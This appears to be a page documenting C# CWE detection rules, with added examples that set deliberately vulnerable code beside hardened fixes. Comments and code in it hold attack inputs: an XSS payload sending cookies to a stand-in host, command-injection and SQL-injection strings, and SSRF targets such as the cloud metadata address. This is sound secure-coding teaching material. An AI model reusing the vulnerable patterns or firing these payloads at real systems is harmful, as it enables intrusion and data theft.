C#-CWE

Checks for CWEs in C#

Nested Rules

C#-CWE-20

Improper Input Validation (CWE-20): application fails to validate or sanitize input, allowing unexpected values to reach downstream logic

C#-CWE-22

The product uses external input to construct a pathname that should be within a restricted directory, but it does not properly neutralize sequences such as “..” that can resolve to a location that is outside of that directory
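
An added example (not code from the rule set or its documentation) of the pattern this rule looks for in C#: a download handler that joins a user-supplied name onto a storage root, and a hardened version that canonicalizes the result and checks it against the root. The storage root, class and method names are assumptions for the example.

```csharp
using System;
using System.IO;

// Hypothetical download handler (assumption for the example).
public static class FileDownload
{
    // Storage root the handler is supposed to be confined to.
    private static readonly string Root = Path.GetFullPath("/var/app/uploads");

    // VULNERABLE: "../../appsettings.json" escapes Root. Worse, Path.Combine
    // discards Root entirely when name is rooted (e.g. "/etc/passwd"), so a
    // naive ".." filter alone would not help.
    public static byte[] ReadUnsafe(string name)
    {
        return File.ReadAllBytes(Path.Combine(Root, name));
    }

    // HARDENED: reject anything but a bare file name, canonicalize, then
    // require the canonical path to sit under Root.
    public static byte[] ReadSafe(string name)
    {
        // Only a bare file name is expected: no separators, no rooted paths.
        if (string.IsNullOrEmpty(name) || name != Path.GetFileName(name) || Path.IsPathRooted(name))
            throw new ArgumentException("invalid file name", nameof(name));

        // GetFullPath resolves "." and ".." segments before the prefix check.
        string full = Path.GetFullPath(Path.Combine(Root, name));

        // Compare against Root plus a trailing separator so that a sibling such
        // as "/var/app/uploads-old/x" is not accepted as a child of Root.
        string rootWithSep = Root.EndsWith(Path.DirectorySeparatorChar)
            ? Root
            : Root + Path.DirectorySeparatorChar;
        if (!full.StartsWith(rootWithSep, StringComparison.Ordinal))
            throw new UnauthorizedAccessException("path escapes storage root");

        return File.ReadAllBytes(full);
    }
}
```

The prefix check is done on the canonical path, never on the raw input; a check that runs before Path.GetFullPath can be defeated by encoded or redundant segments. On case-insensitive file systems (Windows) a case-insensitive comparison of the prefix is the appropriate variant.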

C#-CWE-77

The product constructs commands or command-like strings using externally-influenced input from an upstream component, but it does not properly neutralize or validate special elements that could change the meaning of the command when sent to a downstream component (leading to command injection or unintended command modification)

C#-CWE-78

The product constructs all or part of an OS command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended OS command when it is sent to a downstream component
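
An added example (not code from the rule set or its documentation) covering both C#-CWE-77 and C#-CWE-78: a host-reachability check that splices user input into a shell command line, and a hardened version that starts the program directly with one argv entry per argument and a positive allowlist on the value. The Ping class and the choice of /bin/sh are assumptions for the example.

```csharp
using System;
using System.Diagnostics;
using System.Text.RegularExpressions;

// Hypothetical reachability check (assumption for the example).
public static class Ping
{
    // VULNERABLE (CWE-77/78): the host is concatenated into a string that a
    // shell re-parses, so "8.8.8.8; id" or "8.8.8.8 && cat /etc/passwd"
    // runs additional commands with the web server's privileges.
    public static string RunUnsafe(string host)
    {
        var psi = new ProcessStartInfo("/bin/sh", "-c \"ping -c 1 " + host + "\"")
        {
            RedirectStandardOutput = true,
            UseShellExecute = false,
        };
        using var p = Process.Start(psi)!;
        return p.StandardOutput.ReadToEnd();
    }

    // Accept only a DNS label / IPv4-literal shape; the leading character class
    // also rejects values that start with "-", which would otherwise be
    // interpreted by ping as an option (argument injection).
    private static readonly Regex HostPattern =
        new(@"^[A-Za-z0-9][A-Za-z0-9.-]{0,252}$", RegexOptions.CultureInvariant);

    // HARDENED: no shell involved, arguments passed individually, value allowlisted.
    public static string RunSafe(string host)
    {
        if (!HostPattern.IsMatch(host))
            throw new ArgumentException("invalid host", nameof(host));

        var psi = new ProcessStartInfo("ping")
        {
            RedirectStandardOutput = true,
            UseShellExecute = false,
        };
        psi.ArgumentList.Add("-c");
        psi.ArgumentList.Add("1");
        psi.ArgumentList.Add(host);   // one argv entry; never re-parsed by a shell

        using var p = Process.Start(psi)!;
        return p.StandardOutput.ReadToEnd();
    }
}
```

ProcessStartInfo.ArgumentList (available since .NET Core 2.1) avoids the quoting problems of the single Arguments string. It removes the command-injection path but not option injection, which is why the allowlist on the value is still needed.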

C#-CWE-79

The product does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users
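
An added example (not code from the rule set or its documentation) of reflected XSS in an ASP.NET Core MVC controller, and the encoded version. The SearchController and its routes are assumptions for the example.

```csharp
using System.Text.Encodings.Web;
using Microsoft.AspNetCore.Mvc;

// Hypothetical search endpoint (assumption for the example).
public class SearchController : Controller
{
    // VULNERABLE: the query string is concatenated into markup that is served
    // as text/html, so ?q=<script>document.location='https://evil.test/?c='+document.cookie</script>
    // executes in the victim's browser.
    [HttpGet("/search/unsafe")]
    public ContentResult Unsafe(string q)
    {
        return Content("<h1>Results for " + q + "</h1>", "text/html");
    }

    // HARDENED: encode for the HTML element context before concatenation.
    // '<', '>', '&', '"' and '\'' become character references and cannot
    // start a tag or attribute.
    [HttpGet("/search/safe")]
    public ContentResult Safe(string q)
    {
        string encoded = HtmlEncoder.Default.Encode(q ?? string.Empty);
        return Content("<h1>Results for " + encoded + "</h1>", "text/html");
    }
}
```

Razor views encode @expressions automatically; the bug reappears when that is bypassed with @Html.Raw(...) or when the value is placed in a different context (an attribute, a URL or an inline script block), each of which needs the matching encoder (JavaScriptEncoder, UrlEncoder) rather than HtmlEncoder.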

C#-CWE-89

The product constructs all or part of an SQL command using externally influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended SQL command when it is sent to a downstream database
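
An added example (not code from the rule set or its documentation) of string-built SQL against SQL Server with Microsoft.Data.SqlClient, the parameterized version, and the allowlist approach for the one thing parameters cannot carry (identifiers). The Users table and its columns are assumptions for the example.

```csharp
using System;
using System.Data;
using Microsoft.Data.SqlClient;

// Hypothetical repository over a Users(Name, Email, Created) table (assumption).
public static class UserRepository
{
    // VULNERABLE: a name of  ' OR 1=1 --  returns the first row of any user;
    // with stacked queries, "'; DROP TABLE Users; --" is executed as well.
    public static string? FindEmailUnsafe(SqlConnection conn, string name)
    {
        using var cmd = conn.CreateCommand();
        cmd.CommandText = "SELECT Email FROM Users WHERE Name = '" + name + "'";
        return cmd.ExecuteScalar() as string;
    }

    // HARDENED: the value travels as a typed parameter and is never part of
    // the SQL text, so quotes and comment markers in it have no syntactic effect.
    public static string? FindEmailSafe(SqlConnection conn, string name)
    {
        using var cmd = conn.CreateCommand();
        cmd.CommandText = "SELECT Email FROM Users WHERE Name = @name";
        cmd.Parameters.Add("@name", SqlDbType.NVarChar, 100).Value = name;
        return cmd.ExecuteScalar() as string;
    }

    // Identifiers (table and column names, ORDER BY targets) cannot be
    // parameterized. Map user input onto a fixed set instead of concatenating it.
    private static readonly string[] SortableColumns = { "Name", "Email", "Created" };

    public static string BuildOrderBy(string column)
    {
        foreach (var c in SortableColumns)
            if (string.Equals(c, column, StringComparison.Ordinal))
                return "ORDER BY " + c;     // emits the allowlisted constant, not the input
        throw new ArgumentException("unknown sort column", nameof(column));
    }
}
```

The same distinction applies with Entity Framework Core: FromSqlInterpolated turns the interpolation holes into parameters, whereas FromSqlRaw with string concatenation is the pattern this rule flags.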

C#-CWE-94

Code Injection / Improper Control of Generation of Code (CWE-94): executing or compiling untrusted input as code or expressions

C#-CWE-269

The application performs improper privilege management, which can allow an attacker to escalate privileges or bypass access controls

C#-CWE-276

Incorrect Default Permissions (CWE-276): files or directories created with insecure default ACLs

C#-CWE-287

The application performs improper authentication, which can allow an attacker to bypass authentication mechanisms

C#-CWE-306

Missing authentication for critical functions (CWE-306)

C#-CWE-352

Public controller methods that change state (POST/PUT/DELETE) must enforce CSRF validation, for example with [ValidateAntiForgeryToken] on the action or a global AutoValidateAntiforgeryToken filter
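
An added example (not code from the rule set or its documentation) of an ASP.NET Core state-changing action without anti-forgery validation, the same action with the attribute, and a global filter that enforces it for every unsafe HTTP method. AccountController, IAccountStore and the Startup class are assumptions for the example.

```csharp
using System;
using Microsoft.AspNetCore.Authorization;
using Microsoft.AspNetCore.Builder;
using Microsoft.AspNetCore.Mvc;
using Microsoft.Extensions.DependencyInjection;

// Hypothetical persistence interface (assumption for the example).
public interface IAccountStore
{
    void SetEmail(string userName, string email);
}

[Authorize]
public class AccountController : Controller
{
    private readonly IAccountStore _store;
    public AccountController(IAccountStore store) => _store = store;

    private string CurrentUser =>
        User.Identity?.Name ?? throw new InvalidOperationException("no authenticated user");

    // FLAGGED: a public POST that changes state with no anti-forgery check.
    // A page on another origin can auto-submit a form to this URL and the
    // browser attaches the victim's session cookie.
    [HttpPost]
    public IActionResult ChangeEmailUnsafe(string email)
    {
        _store.SetEmail(CurrentUser, email);
        return RedirectToAction("Index");
    }

    // HARDENED: the action runs only if the request carries a valid token
    // matching the cookie. The form must emit it (<form asp-action="..."> does
    // so automatically; otherwise @Html.AntiForgeryToken()).
    [HttpPost]
    [ValidateAntiForgeryToken]
    public IActionResult ChangeEmailSafe(string email)
    {
        _store.SetEmail(CurrentUser, email);
        return RedirectToAction("Index");
    }
}

// Alternative: enforce validation for every POST/PUT/PATCH/DELETE so that a
// forgotten attribute is not a vulnerability. GET/HEAD/OPTIONS/TRACE are
// skipped by this filter, which is one more reason they must not change state.
public static class Startup
{
    public static WebApplication Build(string[] args)
    {
        var builder = WebApplication.CreateBuilder(args);
        builder.Services.AddControllersWithViews(options =>
            options.Filters.Add(new AutoValidateAntiforgeryTokenAttribute()));
        var app = builder.Build();
        app.MapDefaultControllerRoute();
        return app;
    }
}
```

Endpoints authenticated by a bearer token in an Authorization header rather than a cookie are not reachable by classic CSRF; the rule matters for cookie-authenticated controllers.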

C#-CWE-362

Race condition: unsynchronized access to shared resources can lead to incorrect behavior or security issues

C#-CWE-434

The web application allows unrestricted upload of files with dangerous types that can be automatically processed within the web server’s environment

C#-CWE-502

Deserialization of untrusted data may lead to remote code execution or arbitrary object instantiation (CWE-502)
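
An added example (not code from the rule set or its documentation) of deserializing a client-supplied session blob with BinaryFormatter, and the same data bound to a fixed type through System.Text.Json. SessionState and SessionCodec are assumptions for the example.

```csharp
using System;
using System.IO;
using System.Runtime.Serialization.Formatters.Binary;
using System.Text.Json;

// Hypothetical payload type carried in a client-side cookie (assumption).
public sealed class SessionState
{
    public string UserName { get; set; } = "";
    public DateTime IssuedAt { get; set; }
}

public static class SessionCodec
{
    // VULNERABLE: BinaryFormatter instantiates whatever types the payload
    // names and runs their deserialization callbacks before the cast below is
    // ever reached. Publicly documented gadget chains turn that into code
    // execution. The API is obsolete (SYSLIB0011), disabled by default from
    // .NET 8 and removed from the runtime in .NET 9.
    public static SessionState DecodeUnsafe(byte[] blob)
    {
        var bf = new BinaryFormatter();
        using var ms = new MemoryStream(blob);
#pragma warning disable SYSLIB0011
        return (SessionState)bf.Deserialize(ms);
#pragma warning restore SYSLIB0011
    }

    // HARDENED: a data-only format bound to one target type. System.Text.Json
    // never reads a type name from the payload, so the attacker controls field
    // values, not which classes are constructed.
    private static readonly JsonSerializerOptions Options = new()
    {
        PropertyNameCaseInsensitive = true,
        MaxDepth = 16,   // bound nesting so deeply nested payloads cannot exhaust the stack
    };

    public static SessionState DecodeSafe(byte[] blob)
    {
        var state = JsonSerializer.Deserialize<SessionState>(blob, Options)
                    ?? throw new InvalidDataException("empty session payload");
        // Validate the contents: a well-formed payload is not a trustworthy one.
        if (string.IsNullOrWhiteSpace(state.UserName))
            throw new InvalidDataException("missing user name");
        return state;
    }

    public static byte[] Encode(SessionState s) =>
        JsonSerializer.SerializeToUtf8Bytes(s, Options);
}
```

The same class of bug exists with Newtonsoft.Json when TypeNameHandling is anything other than None, and with NetDataContractSerializer, SoapFormatter and LosFormatter. Switching format fixes the object-instantiation problem only; a client-held blob still needs an integrity check (MAC or signature) before its field values are trusted.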

C#-CWE-798

The product contains hard-coded credentials, such as passwords, API keys, or tokens, which may allow an attacker to gain unauthorized access if the source code or the compiled assembly is exposed (C# assemblies are trivially decompiled, so compiling does not hide the secret)

C#-CWE-862

The product does not perform an authorization check when an actor attempts to access a resource or perform an action

C#-CWE-863

Incorrect Authorization (CWE-863): sensitive actions performed without verifying user authorization
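
An added example (not code from the rule set or its documentation) covering both C#-CWE-862 and C#-CWE-863: an invoice endpoint that is authenticated but never checks ownership (missing authorization), one that checks ownership against a client-supplied value (incorrect authorization), and a hardened version that derives the owner from the server-side principal. Invoice, IInvoiceStore and the routes are assumptions for the example.

```csharp
using System;
using System.Security.Claims;
using Microsoft.AspNetCore.Authorization;
using Microsoft.AspNetCore.Mvc;

// Hypothetical domain type and store (assumptions for the example).
public record Invoice(int Id, string OwnerId, decimal Amount);

public interface IInvoiceStore
{
    Invoice? Find(int id);
}

[Authorize]   // authentication only: establishes who the caller is, not what they may read
public class InvoiceController : Controller
{
    private readonly IInvoiceStore _store;
    public InvoiceController(IInvoiceStore store) => _store = store;

    // CWE-862: any authenticated user reads any invoice by changing the id.
    [HttpGet("/invoices/unsafe/{id:int}")]
    public IActionResult GetUnsafe(int id)
    {
        var inv = _store.Find(id);
        return inv is null ? NotFound() : Ok(inv);
    }

    // CWE-863: a check exists but tests a value the client controls
    // (?ownerId=...), so the caller simply supplies the victim's id.
    [HttpGet("/invoices/wrongcheck/{id:int}")]
    public IActionResult GetWrongCheck(int id, string ownerId)
    {
        var inv = _store.Find(id);
        if (inv is null || inv.OwnerId != ownerId) return NotFound();
        return Ok(inv);
    }

    // HARDENED: the owner comes from the authenticated principal and the
    // resource-level check runs on every request, in the handler.
    [HttpGet("/invoices/{id:int}")]
    public IActionResult Get(int id)
    {
        string? me = User.FindFirstValue(ClaimTypes.NameIdentifier);
        if (me is null) return Forbid();

        var inv = _store.Find(id);
        // Same response for "does not exist" and "not yours", so ids cannot be enumerated.
        if (inv is null || !string.Equals(inv.OwnerId, me, StringComparison.Ordinal))
            return NotFound();

        return Ok(inv);
    }
}
```

Role or policy attributes ([Authorize(Roles = "...")]) answer "may this kind of user call this action"; they do not answer "may this user see this particular record", which is the check both rules are about.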

C#-CWE-918

Server-Side Request Forgery (SSRF): application issues server-side HTTP requests to URLs influenced by user input, letting an attacker reach internal services or cloud metadata endpoints through the server
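
An added example (not code from the rule set or its documentation) of a "fetch this URL" feature (webhook test, link preview) with no restrictions, and a hardened version that enforces scheme, host allowlist, no userinfo, no redirects, and a non-public-address check on the resolved IPs. SafeFetcher and the allowlisted hosts are assumptions for the example.

```csharp
using System;
using System.Collections.Generic;
using System.Net;
using System.Net.Http;
using System.Net.Sockets;
using System.Threading.Tasks;

// Hypothetical URL-fetching feature (assumption for the example).
public static class SafeFetcher
{
    // VULNERABLE: whatever the user typed is fetched from inside the network:
    // http://169.254.169.254/latest/meta-data/, http://localhost:2375/, file:///etc/passwd
    public static Task<string> FetchUnsafe(string url) =>
        new HttpClient().GetStringAsync(url);

    // Destinations this feature is allowed to contact (assumption for the example).
    private static readonly HashSet<string> AllowedHosts =
        new(StringComparer.OrdinalIgnoreCase) { "api.example.com", "hooks.example.com" };

    private static readonly HttpClient Client = new(new SocketsHttpHandler
    {
        AllowAutoRedirect = false,                 // a 302 to an internal address would bypass every check below
        ConnectTimeout = TimeSpan.FromSeconds(5),
    });

    public static async Task<string> FetchSafe(string url)
    {
        if (!Uri.TryCreate(url, UriKind.Absolute, out var uri))
            throw new ArgumentException("not an absolute URL");
        if (uri.Scheme != Uri.UriSchemeHttps)                   // rejects file:, gopher:, plain http:
            throw new ArgumentException("only https is allowed");
        if (!string.IsNullOrEmpty(uri.UserInfo))                // https://api.example.com@evil.test/
            throw new ArgumentException("userinfo not allowed");
        if (!AllowedHosts.Contains(uri.DnsSafeHost))
            throw new ArgumentException("host not in allowlist");

        // Defence in depth, and the primary control when the allowlist is a
        // pattern rather than a fixed set: refuse anything resolving to a
        // loopback, link-local or private address.
        foreach (var ip in await Dns.GetHostAddressesAsync(uri.DnsSafeHost))
            if (IsPrivateOrLocal(ip))
                throw new ArgumentException("resolves to a non-public address");

        return await Client.GetStringAsync(uri);
    }

    public static bool IsPrivateOrLocal(IPAddress ip)
    {
        if (ip.IsIPv4MappedToIPv6) ip = ip.MapToIPv4();         // ::ffff:127.0.0.1 must fail like 127.0.0.1
        if (IPAddress.IsLoopback(ip)) return true;
        if (ip.AddressFamily == AddressFamily.InterNetworkV6)
            return ip.IsIPv6LinkLocal || ip.IsIPv6SiteLocal || ip.IsIPv6UniqueLocal
                   || ip.Equals(IPAddress.IPv6Any);
        byte[] b = ip.GetAddressBytes();
        return b[0] == 10                                        // 10.0.0.0/8
            || (b[0] == 172 && (b[1] & 0xF0) == 16)              // 172.16.0.0/12
            || (b[0] == 192 && b[1] == 168)                      // 192.168.0.0/16
            || (b[0] == 169 && b[1] == 254)                      // 169.254.0.0/16 (cloud metadata)
            || (b[0] == 100 && (b[1] & 0xC0) == 64)              // 100.64.0.0/10 (shared address space)
            || b[0] == 0;                                        // 0.0.0.0/8
    }
}
```

The resolve-then-connect sequence is still a time-of-check/time-of-use window (DNS rebinding): the name can resolve to a public address for the check and to 127.0.0.1 for the connection. Closing it requires pinning the connection to the validated address, for example with SocketsHttpHandler.ConnectCallback, or placing the fetcher in a network segment with no route to internal services.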

Options